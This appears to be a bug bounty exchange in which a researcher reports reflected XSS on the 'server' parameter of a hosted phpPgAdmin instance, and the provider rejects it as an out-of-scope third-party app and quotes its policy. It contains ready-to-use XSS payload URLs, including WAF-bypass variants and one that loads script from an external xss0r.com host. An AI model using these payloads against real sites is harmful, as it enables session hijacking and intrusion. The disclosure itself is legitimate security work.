Security vulnerabilities

https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=%22{text%3a%3Cimg%2fsrc%3dx+onload%3dconfirm(1)%3E}%22

https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=javascript%3a%2f*"%2f*'%2f*\"%2f*`%2f*><frame+src%3djavascript%3aalert()><%2ftemplate+<%2ftextarea+<%2ftitle+<%2fstyle+<%2fnoscript+<%2fnoembed+<%2fscript+--><<script>alert()<<%2fscript>\+%2f**%2falert()%2f%2f

https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=javascript://%27%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E

disregard the last one

https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=%3clink+rel%3d%22stylesheet%22+href%3d%22%23%22+onload%3d%22window.alert(%27XSS_WAF_BYPASS%27)%22%3e

http://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=%3c%2fpre%3e%3c!-%2500-%3e%3csvg%2f%250D%250A%250D%250A%2fId%3d%22a%22%2fTABindex%3d%221%22%2fonload%3d%22%5cu0061lert(1)%3b%22%3e

https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=%3c%2fpre%3e%3c!-%2500-%3e%3csvg%2f%250D%250A%250D%250A%2fId%3d%22a%22%2fTABindex%3d%221%22%2fonload%3d%22%5cu0061lert(1)%3b%22%3e

Hi I found 4 reflective xss on parameter server=

Hoping to hear from you soon

Hello,

We're running the latest version of phpPgAdmin. I suggest you report it to them.

Kind regards,
Cyril

HI Cyril
I am not sure why i have to report to them the domain is yours https://phppgadmin.alwaysdata.com/

and it is inscope

and it is inscope

No, please read the invalid reports section:

Reports about third-party applications we provide to our customers but aren’t part of our system directly (phpMyAdmin, Roundcube Webmail, etc.), if the vulnerability doesn’t directly exposes customers data and/or metadatas.

Reports on third-party applications that we provide to our customers but are not directly part of our system (phpMyAdmin, Webmail Roundcube, etc.), unless the vulnerability that exposes user data and/or metadata is fixed for more than a month in the upstream version and we are not up to date.